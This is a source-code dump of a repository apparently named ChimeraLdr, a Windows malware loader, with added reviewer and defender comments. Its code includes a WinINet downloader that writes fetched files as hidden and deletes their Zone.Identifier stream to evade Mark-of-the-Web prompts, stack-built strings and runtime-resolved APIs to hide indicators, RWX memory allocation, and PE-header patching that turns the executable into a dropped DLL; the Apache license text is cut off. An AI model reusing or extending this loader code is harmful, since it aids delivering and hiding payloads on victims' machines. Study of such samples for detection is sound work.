11 | -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.exp -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.iobj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.iobj -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.ipdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.ipdb -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.lib -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.log: -------------------------------------------------------------------------------- 1 | cl : command line warning D9025: overriding '/sdl' with '/GS-' 2 | Chimera.cpp 3 | Control.cpp 4 | global.cpp 5 | Install.cpp 6 | memory.cpp 7 | urlsaver.cpp 8 | utils.cpp 9 | C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\utils.cpp(18,23): warning C4244: '=': conversion from 'DWORD' to 'WCHAR', possible loss of data 10 | Creating library C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\Release\Chimera.lib and object C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\Release\Chimera.exp 11 | 
Generating code 12 | Previous IPDB not found, fall back to full compilation. 13 | All 48 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. 14 | Finished generating code 15 | Chimera.vcxproj -> C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\Release\Chimera.exe 16 | -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.obj -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.tlog/Chimera.lastbuildstate: -------------------------------------------------------------------------------- 1 | 
PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.28.29910:TargetPlatformVersion=10.0.19041.0:VcpkgTriplet=x86-windows: 2 | Release|Win32|C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\| 3 | -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.tlog/Chimera.write.1u.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.tlog/Chimera.write.1u.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.vcxproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\Release\Chimera.exe 2 | 
-------------------------------------------------------------------------------- /ChimeraLdr/Release/Control.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Control.obj -------------------------------------------------------------------------------- /ChimeraLdr/Release/Install.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Install.obj -------------------------------------------------------------------------------- /ChimeraLdr/Release/global.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/global.obj -------------------------------------------------------------------------------- /ChimeraLdr/Release/memory.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/memory.obj -------------------------------------------------------------------------------- /ChimeraLdr/Release/urlsaver.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/urlsaver.obj -------------------------------------------------------------------------------- /ChimeraLdr/Release/utils.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/utils.obj 
--------------------------------------------------------------------------------
/ChimeraLdr/Release/vc142.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/vc142.pdb
--------------------------------------------------------------------------------
/ChimeraLdr/Release/vcpkg.applocal.log:
--------------------------------------------------------------------------------


--------------------------------------------------------------------------------
/ChimeraLdr/global.cpp:
--------------------------------------------------------------------------------
#include "global.h"

// Prefix used by the dbg() routines in mydbg.h; also a plain-text string IOC.
CONST WCHAR CONFIG::ProjectName[] = L"ChimeraLdr";

--------------------------------------------------------------------------------
/ChimeraLdr/global.h:
--------------------------------------------------------------------------------
#pragma once

// NOTE(review): the angle-bracket header names on the next three lines were
// stripped by the page extraction and are not reconstructed here.
#include
#include
#include

// Links WinINet for the Downloader class (urlsaver.cpp).
#pragma comment(lib, "wininet.lib")

// Length of the random drop-directory name (Install() / GenerateRandomString()).
static CONST DWORD RandomDirectoryLen = 6;
// Not referenced by any code visible on this page.
static CONST DWORD MAX_ELEVATE_TRIES = 3;


// Marker strings; not referenced by the code visible on this page —
// presumably sentinels for locating/patching data in the binary. Verify.
#define WATERMARK "Chmldr"
#define ENDWATERMARK "hCmldr"

namespace CONFIG
{
    extern CONST WCHAR ProjectName[];
}
#include "mydbg.h"
#include "memory.h"
#include "utils.h"
#include "Install.h"
#include "Control.h"
#include "urlsaver.h"

// Silences the "deprecated / unsafe function" warnings project-wide.  The
// Release build log in this repository also shows /GS- overriding /sdl.
#pragma warning(disable : 4996)
--------------------------------------------------------------------------------
/ChimeraLdr/memory.cpp:
--------------------------------------------------------------------------------
#include "global.h"


/*
 * GlobalMemory — one VirtualAlloc'd region handed out by a bump allocator
 * (localloc) and released wholesale by the destructor.  Used throughout the
 * loader for scratch buffers (paths, STARTUPINFO, download chunks).
 *
 * MemSize: bytes requested; VirtualAlloc rounds up to whole pages.
 *
 * Observations:
 *  - The region is committed PAGE_EXECUTE_READWRITE although it only ever
 *    holds data — an unnecessary RWX private allocation, which is exactly
 *    what memory scanners flag.
 *  - The pStart/pTop pre-check reads members before they are assigned here;
 *    memory.h is not on this page, so whether they carry in-class initialisers
 *    is unknown — if not, this tests indeterminate values. TODO confirm.
 */
GlobalMemory::GlobalMemory(DWORD MemSize)
{
    if ((!this->pStart) && (!this->pTop))
    {
        this->dwSize = MemSize;
        this->pStart = (PBYTE)VirtualAlloc(0, MemSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        this->pTop = this->pStart;
        this->dwReserved = 0;
        if (!this->pStart)
            dbg("Memory manager: error allocating memory page");
    }
    else dbg("Memory manager: memory already allocated in this scope");
}

// Releases the whole region; VirtualFree(NULL) simply fails, so a failed
// allocation is safe to destroy.
GlobalMemory::~GlobalMemory()
{
    VirtualFree(this->pStart, 0, MEM_RELEASE);
}

/*
 * localloc — carve MemSize bytes off the top of the region.  No alignment, no
 * free, no synchronisation.  The comparison is strict (<), so the last byte
 * of the region is never handed out — which is why callers construct
 * GlobalMemory with size + 1.
 *
 * Returns the sub-buffer, or NULL when the region is absent or exhausted.
 */
LPVOID GlobalMemory::localloc(DWORD MemSize)
{
    if ((this->pStart) && ((this->dwReserved + MemSize) < this->dwSize))
    {
        LPVOID ret = this->pTop;
        this->pTop += MemSize;
        this->dwReserved += MemSize;
        return ret;
    }
    else dbg("Memory manager: there is no allocated memory to reserve");
    return NULL;
}
--------------------------------------------------------------------------------
/ChimeraLdr/memory.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/memory.h
--------------------------------------------------------------------------------
/ChimeraLdr/mydbg.h:
--------------------------------------------------------------------------------
#pragma once

#include "global.h"

/*
 * dbg (wide) — emits "<ProjectName>: <str><str2>" via OutputDebugStringW.
 * Compiled to nothing outside _DEBUG.
 *
 * str:  message (must be non-NULL; lstrlenW is applied to it unconditionally)
 * str2: optional suffix.  The guard tests str but measures str2; lstrlenW
 *       returns 0 for NULL, so this is harmless.
 *
 * Buffer: (len(str) + len(str2) + len(ProjectName)) WCHARs * 2 + 10 bytes,
 * which covers the ": " separator and the terminator.
 */
void _inline dbg(LPCWSTR str, LPCWSTR str2 = NULL)
{
#ifdef _DEBUG
    INT len2 = (str != NULL) ? lstrlenW(str2) : 0;
    LPWSTR s = (LPWSTR)VirtualAlloc(0, (lstrlenW(str) + len2 + lstrlenW(CONFIG::ProjectName)) * 2 + 10, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (s)
    {
        wsprintfW(s, L"%s: %s", CONFIG::ProjectName, str);

        if (str2)
        {
            lstrcatW(s, str2);
        }

        OutputDebugStringW(s);

        VirtualFree(s, 0, MEM_RELEASE);
    }
    else
        MessageBoxW(0, L"ERROR IN dbg ROUTINE", L"FATAL ERROR", MB_ICONERROR);


#endif
}

/*
 * dbg (narrow) — widens str/str2 with wsprintfW("%S") and forwards to the
 * wide overload.
 *
 * Observations (documentation pass only):
 *  - This overload is NOT inside #ifdef _DEBUG, so every narrow dbg() call in
 *    a Release build still costs a VirtualAlloc/VirtualFree pair; only the
 *    final OutputDebugStringW is compiled out.
 *  - Buffer arithmetic: the allocation is (len(str) + len(str2) + 10) * 2
 *    bytes, but s2 is placed at WCHAR index 2*len(str)+1 (byte 4*len(str)+2).
 *    Writing len(str2)+1 WCHARs there exceeds the requested size whenever
 *    len(str) > 8 and str2 != NULL — e.g. dbg("Read command: ", pCommand) in
 *    ControlMain.  VirtualAlloc commits whole pages, so for the short strings
 *    used on this page the write stays inside the page and goes unnoticed.
 */
void _inline dbg(LPCSTR str, LPCSTR str2 = NULL)
{


    INT len2 = (str != NULL) ? lstrlenA(str2) : 0;
    LPWSTR s = (LPWSTR)VirtualAlloc(0, (lstrlenA(str) + len2 + 10) * 2, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (s)
    {
        // Pointer arithmetic on LPWSTR: the offset is in WCHARs, not bytes.
        LPWSTR s2 = (s + lstrlenA(str) * 2 + 1);

        wsprintfW(s, L"%S", str);
        if (str2)
            wsprintfW(s2, L"%S", str2);
        else
            s2 = NULL;

        dbg(s, s2);

        VirtualFree(s, 0, MEM_RELEASE);
    }

}

// dbg (DWORD) — prints the value with "%d" (signed formatting of a DWORD).
// The VirtualAlloc result is not checked before wsprintfW.
void _inline dbg(DWORD str)
{

    LPWSTR s = (LPWSTR)VirtualAlloc(0, 512, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    wsprintfW(s, L"%d", str);
    dbg(s);
    VirtualFree(s, 0, MEM_RELEASE);

}
--------------------------------------------------------------------------------
/ChimeraLdr/urlsaver.cpp:
--------------------------------------------------------------------------------
#include "global.h"

/*
 * Downloader::Downloader — opens the WinINet session used by save().
 *
 * The User-Agent is a fixed Chrome 55 / Windows 7 string assembled on the
 * stack (string hiding).  Because it never changes, it is a stable network
 * indicator for this loader.  A direct session is tried first; on failure a
 * second attempt uses the system proxy configuration.
 *
 * Observation: the fallback session is created with INTERNET_FLAG_ASYNC but
 * save() drives it synchronously with no status callback; whether that path
 * actually works is not verified here.
 */
Downloader::Downloader()
{

    WCHAR szUserAgent[] =
    {
        L'M', L'o', L'z', L'i', L'l', L'l', L'a',
        L'/', L'5', L'.', L'0', L' ', L'(', L'W', L'i',
        L'n', L'd', L'o', L'w', L's', L' ', L'N',
        L'T', L' ', L'6', L'.', L'1', L';', L' ',
        L'W', L'O', L'W', L'6', L'4', L')', L' ',
        L'A', L'p', L'p', L'l', L'e', L'W', L'e',
        L'b', L'K', L'i', L't', L'/', L'5', L'3',
        L'7', L'.', L'3', L'6', L' ', L'(', L'K',
        L'H', L'T', L'M', L'L', L',', L' ', L'l', L'i',
        L'k', L'e', L' ', L'G', L'e', L'c', L'k',
        L'o', L')', L' ', L'C', L'h', L'r', L'o',
        L'm', L'e', L'/', L'5', L'5', L'.', L'0',
        L'.', L'2', L'8', L'8', L'3', L'.', L'8',
        L'7', L' ', L'S', L'a', L'f', L'a', L'r',
        L'i', L'/', L'5', L'3', L'7', L'.', L'3',
        L'6', L'\0'
    };


    this->hInternet = InternetOpenW(szUserAgent, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);

    if (!this->hInternet)
    {
        dbg("Loader http warn: Can not retrieve INTERNET handle with OPEN_TYPE_DIRECT");
        dbg("Loader http info: trying to use preconfigured proxy server");

        // Note the different, much shorter UA on this path.
        this->hInternet = InternetOpenW(L"Mozilla", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, INTERNET_FLAG_ASYNC);
        if (!this->hInternet)
        {
            dbg("Loader http error: Error: can not retrieve INTERNET handle");
        }
    }
}

// Closes the session handle if one was obtained.
Downloader::~Downloader()
{
    if (this->hInternet)
    {
        InternetCloseHandle(this->hInternet);
    }
    else
        dbg("Loader warn: internet was not initialized. Nothing to free");
}

/*
 * Downloader::save — fetches `from` and writes it to `to` as a hidden file,
 * then deletes the file's Zone.Identifier alternate data stream.
 *
 * from: URL (wide string) passed straight to InternetOpenUrlW.
 * to:   destination path; overwritten if present (CREATE_ALWAYS).
 * Returns FALSE if the URL could not be opened after 5 immediate retries,
 * the local file could not be created, or the first read yielded nothing;
 * TRUE otherwise.
 *
 * Defender notes:
 *  - Deleting "<file>:Zone.Identifier" strips Mark-of-the-Web, so the
 *    downloaded file is later opened by ShellExecuteW without the usual
 *    SmartScreen/MOTW prompts.  A freshly written hidden file with no such
 *    ADS is itself an artefact worth alerting on.
 *  - There is no HTTP status check: InternetOpenUrlW succeeds for error
 *    responses too, so an error page body would be saved as-is.
 *
 * Observations (documentation pass only):
 *  - Retries are back-to-back with no delay.
 *  - dwRead is only assigned by InternetReadFile; if the first call fails,
 *    the `(!Tries) && (dwRead == 0)` test reads an uninitialised value.
 *  - WriteFile failures are logged but do not change the return value.
 *  - Tries is reused as the count of chunks read.
 */
BOOL Downloader::save(LPWSTR from, LPWSTR to)
{
    if (!this->hInternet)
    {
        dbg("Loader error: can not download file because of internet unitialized");
        return FALSE;
    }

    INT Tries = 0;
    BOOL ret = TRUE;
    do
    {
        this->hFile = InternetOpenUrlW(this->hInternet, from, 0, 0, INTERNET_FLAG_NO_CACHE_WRITE, 0);
        Tries++;
    } while ((Tries != 5) && (!this->hFile));

    if ((Tries == 5) && (!this->hFile))
    {
        dbg("Loader error: max connection tries reached. Can not retrieve url: ");
        dbg(from);
        return FALSE;
    }

    // 1 KiB streaming buffer (region is 1025 because localloc uses '<').
    GlobalMemory MyMem(1025);
    LPVOID pData = MyMem.localloc(1024);
    DWORD dwRead;

    Tries = 0;

    HANDLE hLocal = CreateFileW(to, GENERIC_WRITE, FILE_SHARE_READ, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN, 0);

    if (hLocal != INVALID_HANDLE_VALUE)
    {
        DWORD dwWritten;
        while (InternetReadFile(this->hFile, pData, 1024, &dwRead) == TRUE)
        {
            if (!dwRead)
                break;

            if (!WriteFile(hLocal, pData, dwRead, &dwWritten, 0))
            {
                dbg("Loader error: can not write in file");
                dbg(to);
            }

            Tries++;
        }
        if ((!Tries) && (dwRead == 0))
        {
            dbg("Loader error: error reading file");
            ret = FALSE;
        }

        CloseHandle(hLocal);

        // Mark-of-the-Web removal: 598 bytes = 299 WCHARs for
        // "<to>:Zone.Identifier".  Result of DeleteFileW is ignored.
        GlobalMemory ntfs(600);
        LPWSTR ZoneIdentifier = (LPWSTR)ntfs.localloc(598);
        wsprintfW(ZoneIdentifier, L"%s:Zone.Identifier", to);
        DeleteFileW(ZoneIdentifier);


    }
    else
    {
        dbg("Can not create file: ");
        dbg(to);
        ret = FALSE;
    }
    InternetCloseHandle(this->hFile);

    return ret;
}
--------------------------------------------------------------------------------
/ChimeraLdr/urlsaver.h:
--------------------------------------------------------------------------------
#pragma once

// NOTE(review): the angle-bracket header names below were stripped by the
// page extraction and are not reconstructed here.
#include
#include

/*
 * Downloader — WinINet wrapper: one session handle for the object's lifetime,
 * one request handle per save() call.  See urlsaver.cpp for behaviour and
 * the Zone.Identifier removal.
 */
class Downloader
{
public:
    Downloader();
    BOOL save(LPWSTR from, LPWSTR to);
    ~Downloader();
private:
    HINTERNET hFile;      // request handle of the current/last save() call
    HINTERNET hInternet;  // session handle; NULL if InternetOpenW failed twice
};


--------------------------------------------------------------------------------
/ChimeraLdr/utils.cpp:
--------------------------------------------------------------------------------
#include "global.h"



// Prototype for CryptGenRandom resolved at runtime by name (keeps it out of
// the import table; CryptAcquireContext/CryptReleaseContext are still
// imported normally, so the hiding is partial).
typedef BOOL(WINAPI * CryptGenRandom_proto)(HCRYPTPROV, DWORD, LPBYTE);

/*
 * GenerateRandomString — fills pRandomString[0..dwRandomLen-1] with random
 * lowercase letters a-z drawn from CryptGenRandom.
 *
 * pRandomString: caller-owned buffer of at least dwRandomLen WCHARs.  NO
 *                terminator is written; callers (Install() in Chimera.cpp)
 *                pre-fill the buffer with a terminated default.
 * dwRandomLen:   number of characters to generate.
 * Returns TRUE only if every step succeeded; on FALSE the buffer is unchanged.
 *
 * Note: byte % 26 is slightly biased (256 is not a multiple of 26); irrelevant
 * for a directory name.  "Advapi32.dll" and "CryptGenRandom" are built on the
 * stack (string hiding).
 */
BOOL GenerateRandomString(PWCHAR pRandomString, DWORD dwRandomLen)
{
    BOOL bRet = FALSE;

    HCRYPTPROV hProv;


    if (CryptAcquireContext(&hProv, 0, 0, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT))
    {
        WCHAR Alphabet[27];
        for (DWORD i = 0; i < 26; i++)
            Alphabet[i] = L'a' + i;

        GlobalMemory MyMem(dwRandomLen + 1);

        LPBYTE pRandomIndexes = (LPBYTE)MyMem.localloc(dwRandomLen);

        if (!pRandomIndexes)
        {
            dbg("No memory in random generator");
            CryptReleaseContext(hProv, 0);
            return FALSE;
        }
        CHAR CryptGenRandomName[] = { 'C', 'r', 'y', 'p', 't', 'G', 'e', 'n', 'R', 'a', 'n', 'd', 'o', 'm', '\0' };
        CHAR AdvapiName[] = { 'A', 'd', 'v', 'a', 'p', 'i', '3', '2', '.', 'd', 'l', 'l', '\0' };

        HMODULE hAdvapi = GetModuleHandleA(AdvapiName);
        if (!hAdvapi)
            hAdvapi = LoadLibraryA(AdvapiName);

        if (hAdvapi)
        {
            CryptGenRandom_proto CryptGenRandomFunc = (CryptGenRandom_proto)GetProcAddress(hAdvapi, CryptGenRandomName);
            if (CryptGenRandomFunc)
            {
                if (CryptGenRandomFunc(hProv, dwRandomLen, pRandomIndexes))
                {
                    for (DWORD i = 0; i < dwRandomLen; i++)
                    {
                        pRandomString[i] = Alphabet[pRandomIndexes[i] % 26];
                    }
                    bRet = TRUE;
                }
                else
                    dbg("CryptGenRandom failed");
            }
            else
                dbg("CryptGenRandom not found in advapi");
        }
        else
            dbg("Advapi32.dll not found");

        CryptReleaseContext(hProv, 0);
    }
    else
    {
        dbg("CryptAquireContext error");
    }


    return bRet;
}

/*
 * isDllFlag — TRUE if IMAGE_FILE_DLL is set in the COFF header reached via
 * e_lfanew.  No MZ/e_lfanew validation.  The (DWORD) pointer casts truncate
 * on 64-bit; this project builds Win32 only (see the .lastbuildstate files).
 */
BOOL isDllFlag(PIMAGE_DOS_HEADER pDosHead)
{
    PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)((DWORD)pDosHead + (DWORD)pDosHead->e_lfanew);
    PIMAGE_FILE_HEADER pFileHead = (PIMAGE_FILE_HEADER)&pNt->FileHeader;
    return (pFileHead->Characteristics & IMAGE_FILE_DLL);
}

/*
 * SetDllFlag — marks an in-memory PE image as a DLL by OR-ing IMAGE_FILE_DLL
 * into FileHeader.Characteristics.  Only the "MZ" magic is checked; e_lfanew
 * and the "PE" signature are trusted.
 *
 * Used by BlockCopy() on a copy-on-write view, so the patched header ends up
 * in the dropped copy, not in the running executable.  Returns FALSE when the
 * DOS magic is missing.
 */
BOOL SetDllFlag(PIMAGE_DOS_HEADER pDosHead)
{
    if (pDosHead->e_magic != 0x5A4D)
    {
        dbg("is not PE file");
        return FALSE;
    }
    PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)((DWORD)pDosHead + (DWORD)pDosHead->e_lfanew);
    PIMAGE_FILE_HEADER pFileHead = (PIMAGE_FILE_HEADER)&pNt->FileHeader;

    pFileHead->Characteristics |= IMAGE_FILE_DLL;
    return TRUE;
}

/*
 * IsLibrary — TRUE if the loaded module at SelfModule carries the DLL flag in
 * its in-memory headers (an HMODULE is the image base).  Lets the same image
 * tell whether it is running as the dropped DLL or as the original EXE.
 */
BOOL IsLibrary(HMODULE SelfModule)
{
    if (SelfModule)
    {
        PIMAGE_DOS_HEADER pDosHead = (PIMAGE_DOS_HEADER)SelfModule;
        if (isDllFlag(pDosHead))
        {
            return TRUE;
        }
    }
    else
    {
        dbg("Error GetModuleHandleEx HMODULE NULL");
    }

    return FALSE;
}
--------------------------------------------------------------------------------
/ChimeraLdr/utils.h:
--------------------------------------------------------------------------------
#pragma once

BOOL IsLibrary(HMODULE SelfModule);
BOOL SetDllFlag(PIMAGE_DOS_HEADER pDosHead);
// Writes exactly dwRandomLen characters and no terminator (see utils.cpp).
BOOL GenerateRandomString(PWCHAR pRandomString, DWORD dwRandomLen);
--------------------------------------------------------------------------------
/LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 
39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. 
Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. 
You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 
122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. 
